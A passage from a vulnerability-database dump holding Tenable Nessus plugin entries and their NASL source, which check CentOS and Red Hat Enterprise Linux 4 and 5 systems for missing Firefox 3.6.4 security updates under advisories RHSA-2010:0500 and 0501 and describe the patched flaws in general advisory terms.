audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"devhelp-0.12-20.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"devhelp-devel-0.12-20.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"esc-1.1.0-12.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"firefox-3.6.4-8.el5.centos\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"gnome-python2-extras-2.14.2-6.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"gnome-python2-gtkhtml2-2.14.2-6.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"gnome-python2-gtkmozembed-2.14.2-6.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"gnome-python2-gtkspell-2.14.2-6.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"gnome-python2-libegg-2.14.2-6.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"totem-2.16.7-7.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"totem-devel-2.16.7-7.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"totem-mozplugin-2.16.7-7.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"xulrunner-1.9.2.4-9.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"xulrunner-devel-1.9.2.4-9.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"yelp-2.16.0-26.el5\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"devhelp / devhelp-devel / esc / firefox / gnome-python2-extras / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:07:57", "description": "Updated firefox packages that address several security issues, fix\nbugs, add numerous enhancements, and upgrade Firefox to version 3.6.4,\nare now available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\n[Updated 25 June 2010] The original packages distributed with this\nerratum had a bug which could cause unintended dependencies to be\ninstalled when upgrading. We have updated the packages to correct this\nbug.\n\nMozilla Firefox is an open source web browser.\n\nSeveral flaws were found in the processing of malformed web content. A\nweb page containing malicious content could cause Firefox to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning Firefox. (CVE-2010-1121, CVE-2010-1200, CVE-2010-1202,\nCVE-2010-1203)\n\nA flaw was found in the way browser plug-ins interact. It was possible\nfor a plug-in to reference the freed memory from a different plug-in,\nresulting in the execution of arbitrary code with the privileges of\nthe user running Firefox. (CVE-2010-1198)\n\nSeveral integer overflow flaws were found in the processing of\nmalformed web content. A web page containing malicious content could\ncause Firefox to crash or, potentially, execute arbitrary code with\nthe privileges of the user running Firefox. (CVE-2010-1196,\nCVE-2010-1199)\n\nA focus stealing flaw was found in the way Firefox handled focus\nchanges. A malicious website could use this flaw to steal sensitive\ndata from a user, such as usernames and passwords. (CVE-2010-1125)\n\nA flaw was found in the way Firefox handled the 'Content-Disposition:\nattachment' HTTP header when the 'Content-Type: multipart' HTTP header\nwas also present. A website that allows arbitrary uploads and relies\non the 'Content-Disposition: attachment' HTTP header to prevent\ncontent from being displayed inline, could be used by an attacker to\nserve malicious content to users. (CVE-2010-1197)\n\nA flaw was found in the Firefox Math.random() function. This function\ncould be used to identify a browsing session and track a user across\ndifferent websites. (CVE-2008-5913)\n\nA flaw was found in the Firefox XML document loading security checks.\nCertain security checks were not being called when an XML document was\nloaded. This could possibly be leveraged later by an attacker to load\ncertain resources that violate the security policies of the browser or\nits add-ons. Note that this issue cannot be exploited by only loading\nan XML document. (CVE-2010-0182)\n\nFor technical details regarding these flaws, refer to the Mozilla\nsecurity advisories for Firefox 3.6.4. You can find a link to the\nMozilla advisories in the References section of this erratum.\n\nThis erratum upgrades Firefox from version 3.0.19 to version 3.6.4.\nDue to the requirements of Firefox 3.6.4, this erratum also provides a\nnumber of other updated packages, including esc, totem, and yelp.\n\nThis erratum also contains multiple bug fixes and numerous\nenhancements. Space precludes documenting these changes in this\nadvisory. For details concerning these changes, refer to the Firefox\nRelease Notes links in the References section of this erratum.\n\nImportant: Firefox 3.6.4 is not completely backwards-compatible with\nall Mozilla Add-ons and Firefox plug-ins that worked with Firefox\n3.0.19. Firefox 3.6 checks compatibility on first-launch, and,\ndepending on the individual configuration and the installed Add-ons\nand plug-ins, may disable said Add-ons and plug-ins, or attempt to\ncheck for updates and upgrade them. Add-ons and plug-ins may have to\nbe manually updated.\n\nAll Firefox users should upgrade to these updated packages, which\ncontain Firefox version 3.6.4. After installing the update, Firefox\nmust be restarted for the changes to take effect.", "edition": 29, "published": "2010-06-23T00:00:00", "title": "RHEL 5 : firefox (RHSA-2010:0501)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1203", "CVE-2010-1125", "CVE-2010-1200", "CVE-2010-1197", "CVE-2010-1121", "CVE-2010-3171", "CVE-2010-1196", "CVE-2009-5017", "CVE-2010-0182", "CVE-2010-1201", "CVE-2010-0183", "CVE-2008-5913", "CVE-2010-1028", "CVE-2010-1202", "CVE-2010-1199", "CVE-2010-1198"], "modified": "2010-06-23T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:gnome-python2-gtkmozembed", "p-cpe:/a:redhat:enterprise_linux:totem-mozplugin", "cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:totem", "p-cpe:/a:redhat:enterprise_linux:totem-devel", "p-cpe:/a:redhat:enterprise_linux:yelp", "p-cpe:/a:redhat:enterprise_linux:gnome-python2-gtkhtml2", "p-cpe:/a:redhat:enterprise_linux:xulrunner", "p-cpe:/a:redhat:enterprise_linux:esc", "p-cpe:/a:redhat:enterprise_linux:firefox", "p-cpe:/a:redhat:enterprise_linux:xulrunner-devel", "p-cpe:/a:redhat:enterprise_linux:gnome-python2-extras", "p-cpe:/a:redhat:enterprise_linux:devhelp-devel", "p-cpe:/a:redhat:enterprise_linux:gnome-python2-libegg", "p-cpe:/a:redhat:enterprise_linux:devhelp", "p-cpe:/a:redhat:enterprise_linux:gnome-python2-gtkspell"], "id": "REDHAT-RHSA-2010-0501.NASL", "href": "https://www.tenable.com/plugins/nessus/47119", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2010:0501. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(47119);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-5913\", \"CVE-2009-5017\", \"CVE-2010-0182\", \"CVE-2010-0183\", \"CVE-2010-1028\", \"CVE-2010-1121\", \"CVE-2010-1125\", \"CVE-2010-1196\", \"CVE-2010-1197\", \"CVE-2010-1198\", \"CVE-2010-1199\", \"CVE-2010-1200\", \"CVE-2010-1201\", \"CVE-2010-1202\", \"CVE-2010-1203\", \"CVE-2010-3171\");\n script_xref(name:\"RHSA\", value:\"2010:0501\");\n\n script_name(english:\"RHEL 5 : firefox (RHSA-2010:0501)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated firefox packages that address several security issues, fix\nbugs, add numerous enhancements, and upgrade Firefox to version 3.6.4,\nare now available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\n[Updated 25 June 2010] The original packages distributed with this\nerratum had a bug which could cause unintended dependencies to be\ninstalled when upgrading. We have updated the packages to correct this\nbug.\n\nMozilla Firefox is an open source web browser.\n\nSeveral flaws were found in the processing of malformed web content. A\nweb page containing malicious content could cause Firefox to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning Firefox. (CVE-2010-1121, CVE-2010-1200, CVE-2010-1202,\nCVE-2010-1203)\n\nA flaw was found in the way browser plug-ins interact. It was possible\nfor a plug-in to reference the freed memory from a different plug-in,\nresulting in the execution of arbitrary code with the privileges of\nthe user running Firefox. (CVE-2010-1198)\n\nSeveral integer overflow flaws were found in the processing of\nmalformed web content. A web page containing malicious content could\ncause Firefox to crash or, potentially, execute arbitrary code with\nthe privileges of the user running Firefox. (CVE-2010-1196,\nCVE-2010-1199)\n\nA focus stealing flaw was found in the way Firefox handled focus\nchanges. A malicious website could use this flaw to steal sensitive\ndata from a user, such as usernames and passwords. (CVE-2010-1125)\n\nA flaw was found in the way Firefox handled the 'Content-Disposition:\nattachment' HTTP header when the 'Content-Type: multipart' HTTP header\nwas also present. A website that allows arbitrary uploads and relies\non the 'Content-Disposition: attachment' HTTP header to prevent\ncontent from being displayed inline, could be used by an attacker to\nserve malicious content to users. (CVE-2010-1197)\n\nA flaw was found in the Firefox Math.random() function. This function\ncould be used to identify a browsing session and track a user across\ndifferent websites. (CVE-2008-5913)\n\nA flaw was found in the Firefox XML document loading security checks.\nCertain security checks were not being called when an XML document was\nloaded. This could possibly be leveraged later by an attacker to load\ncertain resources that violate the security policies of the browser or\nits add-ons. Note that this issue cannot be exploited by only loading\nan XML document. (CVE-2010-0182)\n\nFor technical details regarding these flaws, refer to the Mozilla\nsecurity advisories for Firefox 3.6.4. You can find a link to the\nMozilla advisories in the References section of this erratum.\n\nThis erratum upgrades Firefox from version 3.0.19 to version 3.6.4.\nDue to the requirements of Firefox 3.6.4, this erratum also provides a\nnumber of other updated packages, including esc, totem, and yelp.\n\nThis erratum also contains multiple bug fixes and numerous\nenhancements. Space precludes documenting these changes in this\nadvisory. For details concerning these changes, refer to the Firefox\nRelease Notes links in the References section of this erratum.\n\nImportant: Firefox 3.6.4 is not completely backwards-compatible with\nall Mozilla Add-ons and Firefox plug-ins that worked with Firefox\n3.0.19. Firefox 3.6 checks compatibility on first-launch, and,\ndepending on the individual configuration and the installed Add-ons\nand plug-ins, may disable said Add-ons and plug-ins, or attempt to\ncheck for updates and upgrade them. Add-ons and plug-ins may have to\nbe manually updated.\n\nAll Firefox users should upgrade to these updated packages, which\ncontain Firefox version 3.6.4. After installing the update, Firefox\nmust be restarted for the changes to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5913\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-5017\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-0182\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-1121\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-1125\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-1196\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-1197\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-1198\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-1199\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-1200\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-1202\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-1203\"\n );\n # http://mozilla.com/en-US/firefox/3.6.4/releasenotes/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9a62ae28\"\n );\n # http://mozilla.com/en-US/firefox/3.6/releasenotes/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8dbe919c\"\n );\n # http://mozilla.org/security/known-vulnerabilities/firefox35.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1de6834a\"\n );\n # http://www.mozilla.org/security/known-vulnerabilities/firefox36.html#\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ab0bbddd\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2010:0501\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:devhelp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:devhelp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:esc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:gnome-python2-extras\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:gnome-python2-gtkhtml2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:gnome-python2-gtkmozembed\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:gnome-python2-gtkspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:gnome-python2-libegg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:totem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:totem-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:totem-mozplugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xulrunner\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xulrunner-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:yelp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/01/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/06/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/06/23\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2010:0501\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", reference:\"devhelp-0.12-21.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"devhelp-devel-0.12-21.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"esc-1.1.0-12.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"esc-1.1.0-12.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"firefox-3.6.4-8.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"gnome-python2-extras-2.14.2-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"gnome-python2-extras-2.14.2-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"gnome-python2-extras-2.14.2-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"gnome-python2-gtkhtml2-2.14.2-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"gnome-python2-gtkhtml2-2.14.2-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"gnome-python2-gtkhtml2-2.14.2-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"gnome-python2-gtkmozembed-2.14.2-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"gnome-python2-gtkmozembed-2.14.2-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"gnome-python2-gtkmozembed-2.14.2-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"gnome-python2-gtkspell-2.14.2-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"gnome-python2-gtkspell-2.14.2-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"gnome-python2-gtkspell-2.14.2-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"gnome-python2-libegg-2.14.2-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"gnome-python2-libegg-2.14.2-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"gnome-python2-libegg-2.14.2-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"totem-2.16.7-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"totem-devel-2.16.7-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"totem-mozplugin-2.16.7-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"totem-mozplugin-2.16.7-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"totem-mozplugin-2.16.7-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"xulrunner-1.9.2.4-10.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"xulrunner-devel-1.9.2.4-10.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"yelp-2.16.0-26.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"yelp-2.16.0-26.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"yelp-2.16.0-26.el5\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"devhelp / devhelp-devel / esc / firefox / gnome-python2-extras / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:07:57", "description": "An updated firefox package that addresses security issues, fixes bugs,\nadds numerous enhancements, and upgrades Firefox to version 3.6.4, is\nnow available for Red Hat Enterprise Linux 4.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nMozilla Firefox is an open source web browser.\n\nSeveral flaws were found in the processing of malformed web content. A\nweb page containing malicious content could cause Firefox to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning Firefox. (CVE-2010-1121, CVE-2010-1200, CVE-2010-1202,\nCVE-2010-1203)\n\nA flaw was found in the way browser plug-ins interact. It was possible\nfor a plug-in to reference the freed memory from a different plug-in,\nresulting in the execution of arbitrary code with the privileges of\nthe user running Firefox. (CVE-2010-1198)\n\nSeveral integer overflow flaws were found in the processing of\nmalformed web content. A web page containing malicious content could\ncause Firefox to crash or, potentially, execute arbitrary code with\nthe privileges of the user running Firefox. (CVE-2010-1196,\nCVE-2010-1199)\n\nA focus stealing flaw was found in the way Firefox handled focus\nchanges. A malicious website could use this flaw to steal sensitive\ndata from a user, such as usernames and passwords. (CVE-2010-1125)\n\nA flaw was found in the way Firefox handled the 'Content-Disposition:\nattachment' HTTP header when the 'Content-Type: multipart' HTTP header\nwas also present. A website that allows arbitrary uploads and relies\non the 'Content-Disposition: attachment' HTTP header to prevent\ncontent from being displayed inline, could be used by an attacker to\nserve malicious content to users. (CVE-2010-1197)\n\nA flaw was found in the Firefox Math.random() function. This function\ncould be used to identify a browsing session and track a user across\ndifferent websites. (CVE-2008-5913)\n\nA flaw was found in the Firefox XML document loading security checks.\nCertain security checks were not being called when an XML document was\nloaded. This could possibly be leveraged later by an attacker to load\ncertain resources that violate the security policies of the browser or\nits add-ons. Note that this issue cannot be exploited by only loading\nan XML document. (CVE-2010-0182)\n\nFor technical details regarding these flaws, refer to the Mozilla\nsecurity advisories for Firefox 3.6.4. You can find a link to the\nMozilla advisories in the References section of this erratum.\n\nThis erratum upgrades Firefox from version 3.0.19 to version 3.6.4,\nand as such, contains multiple bug fixes and numerous enhancements.\nSpace precludes documenting these changes in this advisory. For\ndetails concerning these changes, refer to the Firefox Release Notes\nlinks in the References section of this erratum.\n\nImportant: Firefox 3.6.4 is not completely backwards-compatible with\nall Mozilla Add-ons and Firefox plug-ins that worked with Firefox\n3.0.19. Firefox 3.6 checks compatibility on first-launch, and,\ndepending on the individual configuration and the installed Add-ons\nand plug-ins, may disable said Add-ons and plug-ins, or attempt to\ncheck for updates and upgrade them. Add-ons and plug-ins may have to\nbe manually updated.\n\nAll Firefox users should upgrade to this updated package, which\ncontains Firefox version 3.6.4. After installing the update, Firefox\nmust be restarted for the changes to take effect.", "edition": 29, "published": "2010-06-23T00:00:00", "title": "RHEL 4 : firefox (RHSA-2010:0500)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1203", "CVE-2010-1125", "CVE-2010-1200", "CVE-2010-1197", "CVE-2010-1121", "CVE-2010-3171", "CVE-2010-1196", "CVE-2009-5017", "CVE-2010-0182", "CVE-2010-1201", "CVE-2010-0183", "CVE-2008-5913", "CVE-2010-1028", "CVE-2010-1202", "CVE-2010-1199", "CVE-2010-1198"], "modified": "2010-06-23T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:4", "cpe:/o:redhat:enterprise_linux:4.8", "p-cpe:/a:redhat:enterprise_linux:firefox"], "id": "REDHAT-RHSA-2010-0500.NASL", "href": "https://www.tenable.com/plugins/nessus/47118", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2010:0500. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(47118);\n script_version(\"1.26\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-5913\", \"CVE-2009-5017\", \"CVE-2010-0182\", \"CVE-2010-0183\", \"CVE-2010-1028\", \"CVE-2010-1121\", \"CVE-2010-1125\", \"CVE-2010-1196\", \"CVE-2010-1197\", \"CVE-2010-1198\", \"CVE-2010-1199\", \"CVE-2010-1200\", \"CVE-2010-1201\", \"CVE-2010-1202\", \"CVE-2010-1203\", \"CVE-2010-3171\");\n script_xref(name:\"RHSA\", value:\"2010:0500\");\n\n script_name(english:\"RHEL 4 : firefox (RHSA-2010:0500)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated firefox package that addresses security issues, fixes bugs,\nadds numerous enhancements, and upgrades Firefox to version 3.6.4, is\nnow available for Red Hat Enterprise Linux 4.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nMozilla Firefox is an open source web browser.\n\nSeveral flaws were found in the processing of malformed web content. A\nweb page containing malicious content could cause Firefox to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning Firefox. (CVE-2010-1121, CVE-2010-1200, CVE-2010-1202,\nCVE-2010-1203)\n\nA flaw was found in the way browser plug-ins interact. It was possible\nfor a plug-in to reference the freed memory from a different plug-in,\nresulting in the execution of arbitrary code with the privileges of\nthe user running Firefox. (CVE-2010-1198)\n\nSeveral integer overflow flaws were found in the processing of\nmalformed web content. A web page containing malicious content could\ncause Firefox to crash or, potentially, execute arbitrary code with\nthe privileges of the user running Firefox. (CVE-2010-1196,\nCVE-2010-1199)\n\nA focus stealing flaw was found in the way Firefox handled focus\nchanges. A malicious website could use this flaw to steal sensitive\ndata from a user, such as usernames and passwords. (CVE-2010-1125)\n\nA flaw was found in the way Firefox handled the 'Content-Disposition:\nattachment' HTTP header when the 'Content-Type: multipart' HTTP header\nwas also present. A website that allows arbitrary uploads and relies\non the 'Content-Disposition: attachment' HTTP header to prevent\ncontent from being displayed inline, could be used by an attacker to\nserve malicious content to users. (CVE-2010-1197)\n\nA flaw was found in the Firefox Math.random() function. This function\ncould be used to identify a browsing session and track a user across\ndifferent websites. (CVE-2008-5913)\n\nA flaw was found in the Firefox XML document loading security checks.\nCertain security checks were not being called when an XML document was\nloaded. This could possibly be leveraged later by an attacker to load\ncertain resources that violate the security policies of the browser or\nits add-ons. Note that this issue cannot be exploited by only loading\nan XML document. (CVE-2010-0182)\n\nFor technical details regarding these flaws, refer to the Mozilla\nsecurity advisories for Firefox 3.6.4. You can find a link to the\nMozilla advisories in the References section of this erratum.\n\nThis erratum upgrades Firefox from version 3.0.19 to version 3.6.4,\nand as such, contains multiple bug fixes and numerous enhancements.\nSpace precludes documenting these changes in this advisory. For\ndetails concerning these changes, refer to the Firefox Release Notes\nlinks in the References section of this erratum.\n\nImportant: Firefox 3.6.4 is not completely backwards-compatible with\nall Mozilla Add-ons and Firefox plug-ins that worked with Firefox\n3.0.19. Firefox 3.6 checks compatibility on first-launch, and,\ndepending on the individual configuration and the installed Add-ons\nand plug-ins, may disable said Add-ons and plug-ins, or attempt to\ncheck for updates and upgrade them. Add-ons and plug-ins may have to\nbe manually updated.\n\nAll Firefox users should upgrade to this updated package, which\ncontains Firefox version 3.6.4. After installing the update, Firefox\nmust be restarted for the changes to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5913\"\n );\n 